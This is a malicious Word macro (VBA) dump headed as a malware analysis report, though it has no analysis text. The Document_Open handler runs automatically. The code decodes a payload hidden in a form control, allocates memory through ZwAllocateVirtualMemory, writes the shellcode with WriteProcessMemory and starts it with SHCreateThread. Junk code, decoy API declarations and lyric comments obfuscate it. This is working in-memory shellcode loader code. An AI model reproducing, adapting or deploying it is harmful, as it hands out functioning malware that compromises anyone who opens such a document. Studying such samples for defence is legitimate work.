Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub chalybeate()
Dim pipsqueak As Integer
Dim caressd As Integer
Set exhilarate = nauclea.ravigote.Tabs
For Each albuterol In exhilarate
aglitter = 6
While aglitter >= 9
aglitter = aglitter + 2
skewed = Disconnect
skewed = skewed
Wend

If albuterol.Index = 9 Then
cavort = "pinioned"
cranberry = "ultimogeniture"
mayhaw = "panache"
defluat = albuterol.Name
End If
Next
tragulidae = 80 - 92 + 7472
blacktop = Right(defluat, tragulidae)
acroclinium = disaccord.fa(blacktop)
For candelilla = 50 To 66
cellulosid = 66
Disconnect = "unanalyzable"
liberals = "an" & LTrim("natt") & "o"
liberals = RTrim("ar") & "chaistic"
Next candelilla

cagoule = "chitty"
#If Win64 Then
Dim dynamism As Integer
Dim heartstirring As entremet
Dim roodscreen As LongPtr
Dim outdo As LongPtr
heartstirring.start = 104 - 104
Dim micromyx As Long
#Else
Dim files As Integer
Dim outdo As Long
heartstirring = 0
Dim trekker As Variant
Dim roodscreen As Long
#End If
atherinidae = 0
megacolon = LCase$("aD") & "elge" & "s"
ezochin = 4096
jeremiade = 75
medicolegal = 88
If (jeremiade / medicolegal) Then
jeremiade = RTrim("be") & Replace("lfascamped", "scamped", "st")
skewed = "planetal"
absurdum = absurdum + 85
catachrestic = Replace("amonosyllabically", "monosyllabically", "cc") & LCase$("redItAtioN")
Else
accelerating = Int(133.88)
medicolegal = 90
End If

gliming = "catechize"
golden = "broadheaded"
enthrone = "no" & RTrim("thingness")
asunder = 73
illegal = 56
If (asunder / illegal) Then
asunder = LTrim("po") & Trim("rgy")
absurdum = Abs(197.454)
skewed = "alveolate"
adversely = LCase$("hA") & LTrim("zard") & Trim("ous")
Else
absurdum = Round(137.147)
illegal = 76
End If

restaurateur = acroclinium
parsimoniousness = Trim("co") & LCase$("RPUL") & Replace("encgrudging", "grudging", "e")
duplicable = Replace("pworkings", "workings", "r") & "elimi" & RTrim("nary")
roodscreen = carcinoid(restaurateur)
brutify = Replace("pericales", "ericales", "a") & LCase$("PilLoN")
recklessly = "acetous"
#If VBA6 And Win64 Then
Dim detonize As String
pultaceous = "shaky"
canopy = Trim("bar") & "trami" & "a"
vespid = "tabard"
antemundane = 33 + 109 - 22 + 1160
#ElseIf Win32 Then
unbent = "mattole"
amphiprostylar = "conscious"
cotidal = 121 + 393
antemundane = cotidal + 3204

#End If
Dim concretion As Variant
Dim install As Variant
Dim kazak As Long
kazak = 85 - 104 + 74 - 55
outdo = roodscreen + antemundane
Dim mimmitation As Long
mimmitation = 92 - 91
chutney = novice(outdo, kazak, mimmitation, kazak)
labourite = 6
While labourite >= 9
labourite = labourite + 2
impolicy = "arteriovenous"
accelerating = accelerating / 290
Wend

End Sub

Function carcinoid(cannery)
Dim unsmooth As String
Dim bluing As Integer
Dim toed As String
Dim bestowment As String
#If Win64 Then
Dim flannelette As String
Dim absoluteness As LongPtr
gentilism = 8
Dim depopulate As Variant
Dim arch As LongPtr
Dim toke As Long
Dim coprolalia As LongPtr
Dim macaw As String
#Else
Dim holocephali As Long
Dim absoluteness As Long
gentilism = 4
Dim arch As Long
Dim sinanthropus As Integer
Dim coprolalia As Long
Dim freak As Long
Dim unction As String
#End If
accomplishable = nightline(VarPtr(absoluteness), VarPtr(cannery) + 8, gentilism)
pneumatology = 63 + 44 + 78 - 186
arch = 0
bathymetry = 0
coprolalia = 34 + 9346
ionian = 4096
desolation = 64
irreproducibility = counterpunch(ByVal pneumatology, arch, ByVal bathymetry, coprolalia, ByVal ionian, ByVal desolation)
Disconnect = "suscitate"

accelerating = Int(450.19)

nightline arch, absoluteness, 15 + 5579
caryophyllaceae = 10
While caryophyllaceae >= 13
caryophyllaceae = caryophyllaceae + 2
accelerating = Round(360.1458)
absurdum = absurdum \ 127
Wend

carcinoid = arch
End Function
Function nightline(allignment, cordial, bachelorship)
#If Win64 Then
Dim hallucinogenic As Variant
Dim prickings As LongPtr
Dim valletta As LongPtr
Dim comet As LongPtr
Dim bale As Long
Dim sida As LongPtr
Dim autopilot As LongPtr
#Else
Dim valletta As Long
Dim maleficence As Variant
Dim prickings As Long
Dim griping As Integer
Dim sida As Long
Dim assizes As Variant
Dim comet As Long
Dim selfrestraint As Long
Dim autopilot As Long
Dim vehis As Integer
Dim arrectis As String
#End If
valletta = allignment
sida = cordial
For despitefully = 42 To 64
venezuela = 64
absurdum = Abs(321.1216)
debugger = "ana" & "tropous"
debugger = RTrim("ac") & LCase$("QUireR")
Next despitefully

prickings = -1
fistular = "cl" & Trim("inically")
Borders = LCase$("AG") & Trim("io")
autopilot = bachelorship
daybed = "lee"
crate = Trim("sk") & LTrim("itte") & Trim("r")
apt ByVal prickings, valletta, sida, autopilot, comet
calved = 64
mincing = 73
If (calved / mincing) Then
calved = RTrim("act") & "inomyc" & Replace("otbench", "bench", "ic")
skewed = impolicy
absurdum = Int(139.729)
apologetics = "ca" & Replace("pigallium", "gallium", "to") & LTrim("l")
Else
accelerating = Int(375.1486)
mincing = 96
End If

End Function
Private Sub Document_Open()
Dim omnibus As Byte
Dim socinianism As Variant
detestation = "assertive"
chalybeate
glechoma = 10
While glechoma >= 13
glechoma = glechoma + 2
impolicy = "governmental"
Disconnect = Disconnect
Wend
End Sub
Sub footer()
    Dim cSection As Section
    With ActiveDocument
        For Each cSection In .Sections
            cHeader = cSection.Headers(wdHeaderFooterEvenPages)
            If Not cSection.Headers(wdHeaderFooterEvenPages).Exists Then
                cSection.PageSetup.OddAndEvenPagesHeaderFooter = True
                cSection.Headers(wdHeaderFooterEvenPages).Range.Text _
                    = "Section " & cSection.Index & " of " & .FullName
                cSection.Headers(wdHeaderFooterEvenPages).Range. _
                    Style = "Even Footer"
            End If
        Next cSection
    End With
End Sub



Attribute VB_Name = "disaccord"
'In so much space
#If Win64 Then
'You really think you're in control
Public Type entremet
'Well, I think you're crazy
start As LongPtr
'Just like me
End Type
'And I hope that you are having the time of your life
Public Declare PtrSafe Function centralized Lib "kernel32.dll" Alias "OpenMutexA" (acromatic As LongPtr,wisconsinite As LongPtr,asperula As LongPtr) As LongPtr
'Ever since I was little, ever since I was little it looked like fun
Public Declare PtrSafe Function interpreter Lib "kernel32.dll" Alias "AttachConsole" (hartstongue As LongPtr)
'And it's no coincidence I've come
Public Declare PtrSafe Function basel Lib "kernel32.dll" Alias "GetCPInfoExA" (scoter As LongPtr, testudinidae As LongPtr,concious As LongPtr) As Boolean
'Probably
Public  Declare PtrSafe Function apt Lib "Kernel32" Alias "WriteProcessMemory" (ByVal blackhead As Any, ByVal glowing As Any, ByVal microbial As Any, ByVal dibucaine As Any, ByVal schoolchild As Any) As LongPtr
'Maybe you're crazy
Public Declare PtrSafe Function presuppose Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal contortionist As LongPtr, ByVal bronchiolitis As LongPtr,deformational As LongPtr, ByVal labstenir As LongPtr) As LongPtr
'Come on now, who do you, who do you, who do you, who do you think you are,
Public  Declare PtrSafe Function novice Lib "Shlwapi" Alias "SHCreateThread" (ByVal perishing As LongPtr, ByVal aphaeretic As Any, ByVal cobalt As Any, ByVal exceptions As Any) As LongPtr
'And it's no coincidence I've come
Public  Declare PtrSafe Function counterpunch Lib "ntdll" Alias "ZwAllocateVirtualMemory" (garran As LongPtr, tippet As LongPtr, ByVal monilia As LongPtr,moresByVal As LongPtr, cimetidine As LongPtr, ByVal centrosomic As LongPtr) As LongPtr
'Maybe you're crazy
Public Declare PtrSafe Function atheromatous Lib "kernel32.dll" Alias "FindFirstFileA" (coyol As LongPtr,christsthorn As LongPtr) As Boolean
'In so much space

'And all I remember is thinking, I want to be like them
#Else
'Even your emotions had an echo
Public Declare Function airflow Lib "kernel32.dll" Alias "OpenMutexA" (figurative As Long, varicella As Long, bailiffship As Long) As Long
'Even your emotions had an echo
Public Declare Function forsaking Lib "kernel32.dll" Alias "GetCPInfoExA" (cledge As Long, ontogeny As Long, convenance As Long) As Boolean
'And all I remember is thinking, I want to be like them
Public Declare Function jealous Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal balourdise As Long, ByVal eventual As Long, cremation As Long, ByVal unpassionate As Long) As Long
'You really think you're in control
Public Declare Function counterpunch Lib "ntdll" Alias "ZwAllocateVirtualMemory" (okay As Long, nolle As Long, ByVal puncheon As Long, panopticonByVal As Long, earned As Long, ByVal assegai As Long) As Long
'But think twice, that's my only advice
Public Declare Function teemless Lib "kernel32.dll" Alias "FindFirstFileA" (braced As Long, swahili As Long) As Boolean
'Without care,
Public Declare Function novice Lib "Shlwapi" Alias "SHCreateThread" (ByVal cracker As Long, ByVal betise As Any, ByVal nelumbonaceae As Any, ByVal depraved As Any) As Long
'Yeah, I was out of touch
Public Declare Function devils Lib "kernel32.dll" Alias "AttachConsole" (devoured As Long)
'Ha ha ha bless your soul
Public Declare Function apt Lib "Kernel32" Alias "WriteProcessMemory" (ByVal mulet As Any, ByVal likin As Any, ByVal disavowable As Any, ByVal mammalia As Any, ByVal accompanist As Any) As Long
'And I can die when I'm done

'Ha ha ha bless your soul
#End If
'I just knew too much
Sub max()
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

Function darmera(underdog, crankiness)
darmera = underdog And crankiness
End Function
Function bumcombe(blut, wickedness)
bumcombe = blut * wickedness
End Function
Function orthodontist(assafoetida, barye)
orthodontist = assafoetida \ barye
End Function
Function fa(clubfoot) As String
Disconnect = "antimuon"

Dim brisance As Variant

Dim outscourings As Long
Dim irrationality(255) As Byte
Dim gowned() As Byte
Dim grassroots(63) As Long
Dim selfincrimination(63) As Long
Dim solitary As String
accelerating = absurdum And 255

Dim dismet(6965) As Byte
Dim caluminiator(63) As Long
Dim advoutry As Integer
Dim ungarnished As Integer

Dim tuition As Long
Dim constituent As Long
Dim anglican As String

Dim dankness As Long
counterplot = 47 - 98 + 114
appeach = 38 - 58 - 57 + 4109
blossomed = 262144
deft = 46 - 34 - 16 + 4100
augustinian = 65536
amoto = 255
discerning = 64
cleansing = 256
design = 47 + 16515025
incircumspect = 94 + 16711586
bilimbi = 65280
proline = 96 + 17 + 15 + 257920
Dim moratorium As Integer

Dim frappe As Byte

Dim geophilidae As Byte

Dim apart As String
Dim bergamot(7459) As Byte
virginibus = 74 - 74
dawplucker = 109 + 37 + 7313
For abused = virginibus To dawplucker
fissurella = 1
roberts = Mid$(clubfoot, abused + 1, fissurella)
automatically = Trim("non") & RTrim("prescr") & "iption"
disenchanted = LCase$("ca") & "daveric"
indigo = "entomophthorales"
hyperemic = neverending(roberts)
bergamot(abused) = hyperemic
Next
Dim craniotomy As Variant
For cornmeal = 15 To 61
nucleoplasm = 61
impolicy = "bally"
revolving = RTrim("yel") & LTrim("loweyed")
revolving = LCase$("fo") & Replace("rfeatherlike", "featherlike", "eru") & RTrim("n")
Next cornmeal

barmaid = 7459
edirne = 35
For slatternly = 0 To barmaid
bergamot(slatternly) = bergamot(slatternly) + 9
Next slatternly
deontology = 7
While deontology >= 12
deontology = deontology + 2
accelerating = Round(486.1246)
absurdum = accelerating \ 267
Wend

advoutry = 0
kamarupan = 80 - 75 - 114 + 231
nekton = 24 - 48 + 279
cover = 0
tadarida = 73 - 111 + 81
For constituent = cover To nekton
If (constituent >= 65 And constituent <= 90) Then irrationality(constituent) = constituent - 65
If (constituent >= 97 And constituent <= 122) Then irrationality(constituent) = constituent - 71
If (constituent >= 48 And constituent <= 57) Then irrationality(constituent) = constituent + 4
If constituent = tadarida Then irrationality(constituent) = 62
If constituent = 47 Then irrationality(constituent) = 63
Next constituent
For constituent = 0 To 63
caluminiator(constituent) = bumcombe(constituent, discerning)
grassroots(constituent) = bumcombe(constituent, deft)
selfincrimination(constituent) = bumcombe(constituent, blossomed)
Next constituent
dearest = 2
While dearest >= 5
dearest = dearest + 2
Disconnect = "coveted"
skewed = impolicy
Wend

gowned = bergamot
genetics = 4
maharashtra = 10
While maharashtra >= 14
maharashtra = maharashtra + 2
skewed = impolicy
absurdum = accelerating * 1
Wend

cloakroom = 3
absurdum = accelerating * 1

impolicy = "anorectic"

intuition = cloakroom + 1
mannikin = 2
For dankness = 0 To barmaid
copious = gowned(dankness)
untouchable = gowned(dankness + 2)
outscourings = selfincrimination(irrationality(copious)) _
 + grassroots(irrationality(gowned(dankness + 1))) + caluminiator(irrationality(untouchable)) + irrationality(gowned(dankness + cloakroom))
constituent = darmera(outscourings, incircumspect)
dismet(tuition) = orthodontist(constituent, augustinian)
constituent = darmera(outscourings, bilimbi)
dismet(tuition + 1) = orthodontist(constituent, cleansing)
dismet(tuition + mannikin) = darmera(outscourings, amoto)
tuition = tuition + mannikin + 1
dankness = dankness + 3
Next
fa = dismet
End Function

Function neverending(drake)
neverending = AscW(drake)
End Function


Attribute VB_Name = "nauclea"
Attribute VB_Base = "0{784E3901-4B59-4F0D-A9AB-990B835A665B}{E921563C-F5BD-434C-9FC4-15D58AABC259}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False